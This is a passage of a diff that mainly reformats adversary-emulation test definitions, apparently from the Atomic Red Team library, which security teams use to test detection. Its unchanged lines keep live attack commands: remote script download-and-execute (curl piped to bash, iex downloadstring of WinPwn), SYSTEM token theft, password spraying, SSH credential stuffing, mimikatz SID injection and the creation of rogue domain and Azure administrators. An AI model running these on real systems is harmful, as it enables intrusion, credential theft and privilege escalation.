    username:
      description: Azure username
      type: string
-      default: null
+      default:
    password:
      description: Azure password
      type: string
-      default: null
+      default:
    resource_group:
      description: Name of the resource group
      type: string
-      default: null
+      default:
    runbook_name:
      description: Name of the runbook name
      type: string
-      default: null
+      default:
    automation_account_name:
      description: Name of the automation account name
      type: string
-      default: null
+      default:
  dependency_executor_name: powershell
  dependencies:
  - description: |
@@ -89,7 +89,7 @@ atomic_tests:
    prereq_command: |
      terraform version
    get_prereq_command: |
-        echo Please install terraform.
+      echo Please install terraform.
  - description: |
      Install-Module -Name Az
    prereq_command: |
@@ -130,11 +130,11 @@ atomic_tests:
    Identifies an Identity and Access Management (IAM) custom role creation in Google Cloud Platform (GCP). 
    Custom roles are user-defined, and allow for the bundling of one or more supported permissions to meet specific needs. 
    Custom roles will not be updated automatically and could lead to privilege creep if not carefully scrutinized.
-    
+
    This atomic will create a new IAM role. The default role permissions are: *IAM Service Account Get*
-    
+
    Reference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml
-    
+
  supported_platforms:
  - iaas:gcp
  input_arguments:
@@ -170,9 +170,9 @@ atomic_tests:
      if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
    get_prereq_command: |
      echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
-  - description: | 
+  - description: |
      Check if user is logged in 
    prereq_command: |
      gcloud config get-value account
-    get_prereq_command: |
+    get_prereq_command: |-
      gcloud auth login --no-launch-browser
@@ -433,7 +433,7 @@ atomic_tests:
    command: |
      reg query "HKEY_CURRENT_USER\Control Panel\International\Geo"
    name: command_prompt
- name: BIOS Information Discovery through Registry 
+- name: BIOS Information Discovery through Registry
  auto_generated_guid: f2f91612-d904-49d7-87c2-6c165d23bead
  description: |
    Looks up for BIOS information in the registry. BIOS information is often read in order to detect sandboxing environments.  Upon execution, BIOS information will be displayed.
@@ -314,7 +314,7 @@ atomic_tests:

 - name: Suspicious LAPS Attributes Query with Get-ADComputer all properties
  auto_generated_guid: 394012d9-2164-4d4f-b9e5-acf30ba933fe
-  description: This test executes LDAP query using powershell command Get-ADComputer and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime  
+  description: This test executes LDAP query using powershell command Get-ADComputer and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
  supported_platforms:
  - windows
  input_arguments:
@@ -324,7 +324,7 @@ atomic_tests:
      default: $env:computername
  executor:
    command: 'Get-ADComputer #{hostname} -Properties *'
-    cleanup_command: 
+    cleanup_command:
    name: powershell
    elevation_required: false

@@ -340,21 +340,21 @@ atomic_tests:
      default: $env:computername
  executor:
    command: 'Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime'
-    cleanup_command: 
+    cleanup_command:
    name: powershell
    elevation_required: false
-  
- name: Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope 
+
+- name: Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope
  auto_generated_guid: ffbcfd62-15d6-4989-a21a-80bfc8e58bb5
  description: This test executes LDAP query using powershell command Get-ADComputer with SearchScope as subtree and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
  supported_platforms:
  - windows
  executor:
    command: Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
-    cleanup_command: 
+    cleanup_command:
    name: powershell
    elevation_required: false
-  
+
 - name: Suspicious LAPS Attributes Query with adfind all properties
  auto_generated_guid: abf00f6c-9983-4d9a-afbc-6b1c6c6448e1
  description: This test executes LDAP query using adfind command and lists all the attributes including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
@@ -368,7 +368,7 @@ atomic_tests:
  executor:
    command: |
      & "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -h #{domain} -s subtree -f "objectclass=computer" *
-    cleanup_command: 
+    cleanup_command:
    name: powershell
    elevation_required: false

@@ -385,7 +385,7 @@ atomic_tests:
  executor:
    command: |
      & "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
-    cleanup_command: 
+    cleanup_command:
    name: powershell
    elevation_required: false

@@ -6,7 +6,7 @@ atomic_tests:
  description: |
    Simulates an adversary copying malware to all connected removable drives. 
  supported_platforms:
-    - windows
+  - windows
  executor:
    name: powershell
    command: |
@@ -17,7 +17,7 @@ atomic_tests:
      write-host "Removable Drive Found:" $Drive
      New-Item -Path $Drive/T1091Test1.txt -ItemType "file" -Force -Value "T1091 Test 1 has created this file to simulate malware spread to removable drives."
      }
-    cleanup_command: |
+    cleanup_command: |-
      $RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter "drivetype=2" | select-object -expandproperty DeviceID
      ForEach ($Drive in $RemovableDrives)
      {
@@ -23,7 +23,7 @@ atomic_tests:
  dependency_executor_name: powershell
  dependencies:
  - description: |
-     MSOnline module must be installed.
+      MSOnline module must be installed.
    prereq_command: |
      try {if (Get-InstalledModule -Name MSOnline -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
    get_prereq_command: |
@@ -66,7 +66,7 @@ atomic_tests:
  dependency_executor_name: powershell
  dependencies:
  - description: |
-     MSOnline and AzureAD modules must be installed.
+      MSOnline and AzureAD modules must be installed.
    prereq_command: |
      $required_mods = 'AzureAD', 'MSOnline'
      $installed_mods = @((Get-Module $required_mods -ListAvailable -ErrorAction SilentlyContinue).Name  | Select-Object -Unique)
@@ -95,13 +95,13 @@ atomic_tests:
      $targetsecurepw = ConvertTo-SecureString -String "#{target_password}" -AsPlainText -Force
      Connect-MsolService -Credential $credential -ErrorAction:SilentlyContinue
      Connect-AzureAD -Credential $credential -ErrorAction:SilentlyContinue
-      
+
      #Saving the ObjectId of the target_user into a variable
      $target_objid = Get-AzureADUser -filter "userPrincipalName eq '#{target_user}'" | Select-Object -ExpandProperty ObjectId
-      
+
      #Reset the password of the target_user
      Set-AzureADUserPassword -ObjectId  $target_objid -Password $targetsecurepw -ErrorAction:SilentlyContinue
-    
+
      #Adding target_user
      Add-MsolRoleMember -RoleName "Company Administrator" -RoleMemberEmailAddress "#{target_user}"
      Add-MsolRoleMember -RoleName "Global Reader" -RoleMemberEmailAddress "#{target_user}"
@@ -114,4 +114,4 @@ atomic_tests:
      Remove-MsolRoleMember -RoleName "Company Administrator" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
      Remove-MsolRoleMember -RoleName "Global Reader" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
    name: powershell
-    elevation_required: false
+    elevation_required: false
@@ -1,4 +1,3 @@
---
 attack_technique: T1098.004
 display_name: SSH Authorized Keys

@@ -9,12 +8,12 @@ atomic_tests:
    Modify contents of <user-home>/.ssh/authorized_keys to maintain persistence on victim host. 
    If the user is able to save the same contents in the authorized_keys file, it shows user can modify the file.
  supported_platforms:
-    - linux
-    - macos
+  - linux
+  - macos
  executor:
    name: sh
-    elevation_required: false 
-    command: | 
+    elevation_required: false
+    command: |
      if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat ~/.ssh/authorized_keys); echo "$ssh_authorized_keys" > ~/.ssh/authorized_keys; fi;
-    cleanup_command: | 
+    cleanup_command: |-
      unset ssh_authorized_keys
@@ -509,7 +509,7 @@ atomic_tests:
      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
      Connect-AzureAD -Credential $Credential
-      
+
      $aadApplication = @(Get-AzureADApplication -Filter "DisplayName eq '#{application_name}'")
      If ($aadApplication.Count -eq 0)
      {
@@ -546,7 +546,7 @@ atomic_tests:
    elevation_required: true
    command: |
      ntdsutil "set dsrm password" "sync from domain account #{sync_account}" "q" "q"
-      
+
 - name: 'Domain Password Policy Check: Short Password'
  auto_generated_guid: fc5f9414-bd67-4f5f-a08e-e5381e29cbd1
  description: |
@@ -954,7 +954,7 @@ atomic_tests:
      - Store the result of retrieving a single key for that service account as a variable
      - Pass that variable for deletion
      - Delete the service account
-    
+
    The idea for this Atomic came from a Rule published by the Elastic team.

    Identifies the deletion of an Identity and Access Management (IAM) service account key in Google Cloud Platform (GCP).
@@ -992,7 +992,7 @@ atomic_tests:
      if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
    get_prereq_command: |
      echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
-  - description: | 
+  - description: |
      Check if user is logged in 
    prereq_command: |
      gcloud config get-value account
@@ -1003,12 +1003,12 @@ atomic_tests:
    prereq_command: |
      terraform version
    get_prereq_command: |
-        echo Please install the terraform.
+      echo Please install the terraform.
  - description: |
      Create dependency resources using terraform
    prereq_command: |
      stat "$PathToAtomicsFolder/T1098/src/T1098-17/terraform.tfstate"
-    get_prereq_command: |
+    get_prereq_command: |-
      cd "$PathToAtomicsFolder/T1098/src/T1098-17/"
      terraform init
-      terraform apply -auto-approve
+      terraform apply -auto-approve
@@ -261,6 +261,5 @@ atomic_tests:
      su art
      cd /tmp
      curl -s #{remote_url} |bash
-    cleanup_command: |
+    cleanup_command: |-
      rmuser -y art
-
@@ -3,16 +3,7 @@ display_name: 'Brute Force: Password Spraying'
 atomic_tests:
 - name: Password Spray all Domain Users
  auto_generated_guid: 90bc2e54-6c84-47a5-9439-0a2a92b4b175
-  description:
-    CAUTION! Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently.
-
-    This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list.
-    Any successful authentications will be printed to the screen with a message like "[*] username:password", whereas a failed auth will simply print a period.
-    Use the input arguments to specify your own password to use for the password spray.
-
-    Use the get_prereq_command's to create a list of all domain users in the temp directory called users.txt.
-
-    See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrOneEqualsOne for more details on how these spray commands work. https://medium.com/walmartlabs/windows-for-loop-password-spraying-made-easy-c8cd4ebb86b5
+  description: "CAUTION! Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently.\nThis atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\\users.txt list. Any successful authentications will be printed to the screen with a message like \"[*] username:password\", whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray.\nUse the get_prereq_command's to create a list of all domain users in the temp directory called users.txt.\nSee the \"Windows FOR Loop Password Spraying Made Easy\" blog by @OrOneEqualsOne for more details on how these spray commands work. https://medium.com/walmartlabs/windows-for-loop-password-spraying-made-easy-c8cd4ebb86b5"
  supported_platforms:
  - windows
  input_arguments:
@@ -31,7 +31,6 @@ atomic_tests:
    command: |
      cp "$PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt" /tmp/
      for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
-
 - name: SSH Credential Stuffing From MacOS
  auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
  description: |
@@ -62,7 +61,6 @@ atomic_tests:
    command: |
      cp "$PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt" /tmp/
      for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
-
 - name: SSH Credential Stuffing From FreeBSD
  auto_generated_guid: a790d50e-7ebf-48de-8daa-d9367e0911d4
  description: |
@@ -83,7 +81,7 @@ atomic_tests:
      Requires SSHPASS
    prereq_command: |
      if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
-      
+
    get_prereq_command: |
      pkg install -y sshpass

@@ -93,8 +91,6 @@ atomic_tests:
    command: |
      cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
      for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
-
-
 - name: Brute Force:Credential Stuffing using Kerbrute Tool
  auto_generated_guid: 4852c630-87a9-409b-bb5e-5dc12c9ebcde
  description: |
@@ -129,6 +125,6 @@ atomic_tests:
  executor:
    name: powershell
    elevation_required: false
-    command: |
+    command: |-
      cd "PathToAtomicsFolder\..\ExternalPayloads"
-      .\kerbrute.exe bruteforce --dc #{domaincontroller} -d #{domain} "PathToAtomicsFolder\..\ExternalPayloads\bruteforce.txt"      
+      .\kerbrute.exe bruteforce --dc #{domaincontroller} -d #{domain} "PathToAtomicsFolder\..\ExternalPayloads\bruteforce.txt"
@@ -933,4 +933,3 @@ atomic_tests:
      Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults' -Name 'http' -Value 3
      Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults' -Name 'https' -Value 3
    name: powershell
-
@@ -66,4 +66,3 @@ atomic_tests:
      del %TEMP%\T1119_3.txt >nul 2>&1
      del %TEMP%\T1119_4.txt >nul 2>&1
    name: command_prompt
-
@@ -23,4 +23,4 @@ atomic_tests:
      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
      printercheck -noninteractive -consoleoutput
-    name: powershell
+    name: powershell
@@ -13,4 +13,4 @@ atomic_tests:
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\NonPackaged\C:#Windows#Temp#atomic.exe /v LastUsedTimeStop /t REG_BINARY /d 96ef514b7204d601 /f
    cleanup_command: |
      reg DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\NonPackaged\C:#Windows#Temp#atomic.exe /f
-    name: command_prompt
+    name: command_prompt
@@ -38,7 +38,7 @@ atomic_tests:
      Start chrome
      Start-Sleep -Seconds 30
      Stop-Process -Name "chrome"
-    cleanup_command: |
+    cleanup_command: |-
      $extList = #{extension_id}
      foreach ($extension in $extList) {
      Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore}
@@ -1,29 +1,29 @@
-attack_technique: T1134.002
-display_name: "Create Process with Token"
-atomic_tests:
- name: Access Token Manipulation
-  auto_generated_guid: dbf4f5a9-b8e0-46a3-9841-9ad71247239e
-  description: |
-    This Action demonstrates how an access token for a specific program can spawn another program under a different owner. 
-    Adversaries can leverage access tokens to run programs under a different user not only to achieve privilege escalation but also to evade detection by blending in with normal user activity. 
-    This Action will query all processes and list the process name and owner.It will then make a copy of an existing token to create a new instance of cmd.exe
-  supported_platforms:
-  - windows
-  executor:
-    command: |
-      Set-ExecutionPolicy -Scope Process Bypass -Force
-      $owners = @{}
-      gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
-      Get-Process | Select ProcessName,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}
-      & "$PathToAtomicsFolder\T1134.002\src\GetToken.ps1"; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,"cmd.exe")
-    name: powershell
-    elevation_required: true
- name: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique
-  auto_generated_guid: ccf4ac39-ec93-42be-9035-90e2f26bcd92
-  description: Get SYSTEM shell - Pop System Shell using Token Manipulation technique via function of WinPwn
-  supported_platforms:
-  - windows
-  executor:
-    command: |-
-      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem
-    name: powershell    
+attack_technique: T1134.002
+display_name: "Create Process with Token"
+atomic_tests:
+- name: Access Token Manipulation
+  auto_generated_guid: dbf4f5a9-b8e0-46a3-9841-9ad71247239e
+  description: |
+    This Action demonstrates how an access token for a specific program can spawn another program under a different owner. 
+    Adversaries can leverage access tokens to run programs under a different user not only to achieve privilege escalation but also to evade detection by blending in with normal user activity. 
+    This Action will query all processes and list the process name and owner.It will then make a copy of an existing token to create a new instance of cmd.exe
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      Set-ExecutionPolicy -Scope Process Bypass -Force
+      $owners = @{}
+      gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
+      Get-Process | Select ProcessName,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}
+      & "$PathToAtomicsFolder\T1134.002\src\GetToken.ps1"; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,"cmd.exe")
+    name: powershell
+    elevation_required: true
+- name: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique
+  auto_generated_guid: ccf4ac39-ec93-42be-9035-90e2f26bcd92
+  description: Get SYSTEM shell - Pop System Shell using Token Manipulation technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem
+    name: powershell
@@ -41,5 +41,5 @@ atomic_tests:
    elevation_required: true
    command: |
      #{mimikatz_path} "privilege::debug" "sid::patch" "sid::add /sid:#{sid_to_inject} /sam:#{sam_account_name}" "exit"
-    cleanup_command: |
+    cleanup_command: |-
      #{mimikatz_path} "sid::clear /sam:#{sam_account_name}" "exit"
@@ -122,15 +122,15 @@ atomic_tests:
  executor:
    elevation_required: false
    command: |
-       echo "dn: CN=Admin User,CN=Users,DC=#{domain},DC=#{top_level_domain}\nchangetype: add\nobjectClass: top\nobjectClass: person\nobjectClass: organizationalPerson\nobjectClass: user\ncn: Admin User\nsn: User\ngivenName: Atomic User\nuserPrincipalName: adminuser@#{domain}.#{top_level_domain}\nsAMAccountName: adminuser\nuserAccountControl: 512\nuserPassword: {CLEARTEXT}s3CureP4ssword123!\nmemberOf: CN=Domain Admins,CN=Users,DC=#{domain},DC=#{top_level_domain}" > tempadmin.ldif
-       echo ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
-       ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
+      echo "dn: CN=Admin User,CN=Users,DC=#{domain},DC=#{top_level_domain}\nchangetype: add\nobjectClass: top\nobjectClass: person\nobjectClass: organizationalPerson\nobjectClass: user\ncn: Admin User\nsn: User\ngivenName: Atomic User\nuserPrincipalName: adminuser@#{domain}.#{top_level_domain}\nsAMAccountName: adminuser\nuserAccountControl: 512\nuserPassword: {CLEARTEXT}s3CureP4ssword123!\nmemberOf: CN=Domain Admins,CN=Users,DC=#{domain},DC=#{top_level_domain}" > tempadmin.ldif
+      echo ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
+      ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
    cleanup_command: |
-       echo removing Atomic User (temporary user)
-       echo "dn: cn=Atomic User,cn=Users,dc=scwxscratch,dc=dev\nchangetype: delete" > deleteuser.ldif
-       ldapmodify -H ldap://#{domain_controller}:389 -x -D #{admin_user} -w #{admin_password} -f deleteuser.ldif
-       rm deleteuser.ldif
-       rm tempadmin.ldif
+      echo removing Atomic User (temporary user)
+      echo "dn: cn=Atomic User,cn=Users,dc=scwxscratch,dc=dev\nchangetype: delete" > deleteuser.ldif
+      ldapmodify -H ldap://#{domain_controller}:389 -x -D #{admin_user} -w #{admin_password} -f deleteuser.ldif
+      rm deleteuser.ldif
+      rm tempadmin.ldif
    name: sh
 - name: Active Directory Create User Account (Non-elevated)
  auto_generated_guid: 8c992cb3-a46e-4fd5-b005-b1bab185af31
@@ -171,14 +171,13 @@ atomic_tests:
  executor:
    elevation_required: false
    command: |
-       echo "dn: cn=Atomic User, cn=Users,dc=#{domain},dc=#{top_level_domain}\nobjectClass: person\ncn: Atomic User\nsn: User" > tempadmin.ldif
-       echo ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
-       ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
+      echo "dn: cn=Atomic User, cn=Users,dc=#{domain},dc=#{top_level_domain}\nobjectClass: person\ncn: Atomic User\nsn: User" > tempadmin.ldif
+      echo ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
+      ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
    cleanup_command: |
-       echo removing Atomic User (temporary user)
-       echo "dn: cn=Atomic User,cn=Users,dc=scwxscratch,dc=dev\nchangetype: delete" > deleteuser.ldif
-       ldapmodify -H ldap://#{domain_controller}:389 -x -D #{admin_user} -w #{admin_password} -f deleteuser.ldif
-       rm deleteuser.ldif
-       rm tempadmin.ldif
+      echo removing Atomic User (temporary user)
+      echo "dn: cn=Atomic User,cn=Users,dc=scwxscratch,dc=dev\nchangetype: delete" > deleteuser.ldif
+      ldapmodify -H ldap://#{domain_controller}:389 -x -D #{admin_user} -w #{admin_password} -f deleteuser.ldif
+      rm deleteuser.ldif
+      rm tempadmin.ldif
    name: sh
-
@@ -89,7 +89,7 @@ atomic_tests:
  - description: Check if Azure CLI is installed and install via PowerShell
    prereq_command: az account list
    get_prereq_command: echo "use the following to install the Azure CLI $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'; Remove-Item .\AzureCLI.msi"
-  - description: Update the userprincipalname to meet your requirements  
+  - description: Update the userprincipalname to meet your requirements
    prereq_command: Update the input arguments so the userprincipalname value is accurate for your environment
    get_prereq_command: echo "Update the input arguments in the .yaml file so that the userprincipalname value is accurate for your environment"
  executor:
@@ -21,7 +21,7 @@ atomic_tests:
      Write-Host "You will need to install Microsoft Word manually to meet this requirement"
  - description: DLL files must exist on disk at specified location
    prereq_command: |
-     if ((Test-Path "PathToAtomicsFolder\T1137.002\bin\officetest_x64.dll") -and (Test-Path "PathToAtomicsFolder\T1137.002\bin\officetest_x86.dll")) {exit 0} else {exit 1}
+      if ((Test-Path "PathToAtomicsFolder\T1137.002\bin\officetest_x64.dll") -and (Test-Path "PathToAtomicsFolder\T1137.002\bin\officetest_x86.dll")) {exit 0} else {exit 1}
    get_prereq_command: |-
      New-Item -Type Directory "PathToAtomicsFolder\T1137.002\bin\" -Force | Out-Null
      Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.002/bin/officetest_x64.dll" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.002\bin\officetest_x64.dll"
@@ -41,6 +41,6 @@ atomic_tests:
      }
      Stop-Process -Name "WinWord" 
      Start-Process "WinWord"
-    cleanup_command: |
+    cleanup_command: |-
      Stop-Process -Name "notepad","WinWord" -ErrorAction Ignore
-      Remove-Item "HKCU:\Software\Microsoft\Office test\Special\Perf" -ErrorAction Ignore
+      Remove-Item "HKCU:\Software\Microsoft\Office test\Special\Perf" -ErrorAction Ignore
@@ -34,5 +34,5 @@ atomic_tests:
    elevation_required: false
    command: |
      reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f
-    cleanup_command: |
+    cleanup_command: |-
      reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f >nul 2>&1
@@ -7,7 +7,7 @@ atomic_tests:
    Loads an XLL file using the excel add-ins library.
    This causes excel to launch Notepad.exe as a child process. This atomic test does not include persistent code execution as you would typically see when this is implemented in malware.
  supported_platforms:
-    - windows
+  - windows
  dependencies:
  - description: |
      Microsoft Excel must be installed
@@ -21,13 +21,13 @@ atomic_tests:
      Write-Host "You will need to install Microsoft Excel manually to meet this requirement"
  - description: XLL files must exist on disk at specified location
    prereq_command: |
-     if ((Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x64.xll") -and (Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x86.xll")) {exit 0} else {exit 1}
+      if ((Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x64.xll") -and (Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x86.xll")) {exit 0} else {exit 1}
    get_prereq_command: |-
      New-Item -Type Directory "PathToAtomicsFolder\T1137.006\bin\Addins\" -Force | Out-Null
      Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.006/bin/Addins/excelxll_x64.xll" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x64.xll"
      Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.006/bin/Addins/excelxll_x86.xll" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x86.xll"
  executor:
-    name: powershell 
+    name: powershell
    command: |
      $excelApp = New-Object -COMObject "Excel.Application"
      if(-not $excelApp.path.contains("Program Files (x86)")){
@@ -47,7 +47,7 @@ atomic_tests:
    Creates an Excel Add-in file (XLL) and sets a registry key to make it run automatically when Excel is started
    The sample XLL provided launches the notepad as a proof-of-concept for persistent execution from Office.
  supported_platforms:
-    - windows
+  - windows
  dependencies:
  - description: |
      Microsoft Excel must be installed
@@ -61,7 +61,7 @@ atomic_tests:
      Write-Host "You will need to install Microsoft Excel manually to meet this requirement"
  - description: XLL files must exist on disk at specified location
    prereq_command: |
-     if ((Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x64.xll") -and (Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x86.xll")) {exit 0} else {exit 1}
+      if ((Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x64.xll") -and (Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x86.xll")) {exit 0} else {exit 1}
    get_prereq_command: |-
      New-Item -Type Directory "PathToAtomicsFolder\T1137.006\bin\Addins\" -Force | Out-Null
      Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.006/bin/Addins/excelxll_x64.xll" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x64.xll"
@@ -91,7 +91,7 @@ atomic_tests:
      Stop-Process -Name "notepad","Excel" -ErrorAction Ignore
      Start-Sleep 3
      Remove-Item "$env:APPDATA\Microsoft\AddIns\notepad.xll" -ErrorAction Ignore
-      
+
 - name: Persistent Code Execution Via Word Add-in File (WLL)
  auto_generated_guid: 95408a99-4fa7-4cd6-a7ef-cb65f86351cf
  description: |
@@ -99,7 +99,7 @@ atomic_tests:
    The sample WLL provided launches the notepad as a proof-of-concept for persistent execution from Office.
    Successfully tested on 32-bit Office 2016. Not successful from microsoft 365 version of Office. 
  supported_platforms:
-    - windows
+  - windows
  dependencies:
  - description: |
      Microsoft Word must be installed
@@ -113,7 +113,7 @@ atomic_tests:
      Write-Host "You will need to install Microsoft Word manually to meet this requirement"
  - description: WLL files must exist on disk at specified location
    prereq_command: |
-     if ((Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\wordwll_x64.wll") -and (Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\wordwll_x86.wll")) {exit 0} else {exit 1}
+      if ((Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\wordwll_x64.wll") -and (Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\wordwll_x86.wll")) {exit 0} else {exit 1}
    get_prereq_command: |-
      New-Item -Type Directory "PathToAtomicsFolder\T1137.006\bin\Addins\" -Force | Out-Null
      Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.006/bin/Addins/wordwll_x64.wll" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.006\bin\Addins\wordwll_x64.wll"
@@ -137,14 +137,14 @@ atomic_tests:
      Stop-Process -Name "notepad","WinWord" -ErrorAction Ignore
      Start-Sleep 3
      Remove-Item "$env:APPDATA\Microsoft\Word\Startup\notepad.wll" -ErrorAction Ignore
-      
+
 - name: Persistent Code Execution Via Excel VBA Add-in File (XLAM)
  auto_generated_guid: 082141ed-b048-4c86-99c7-2b8da5b5bf48
  description: |
    Creates an Excel VBA Add-in file (XLAM) which runs automatically when Excel is started
    The sample XLAM provided launches the notepad as a proof-of-concept for persistent execution from Office.
  supported_platforms:
-    - windows
+  - windows
  dependencies:
  - description: |
      Microsoft Excel must be installed
@@ -158,7 +158,7 @@ atomic_tests:
      Write-Host "You will need to install Microsoft Excel manually to meet this requirement"
  - description: XLAM file must exist on disk at specified location
    prereq_command: |
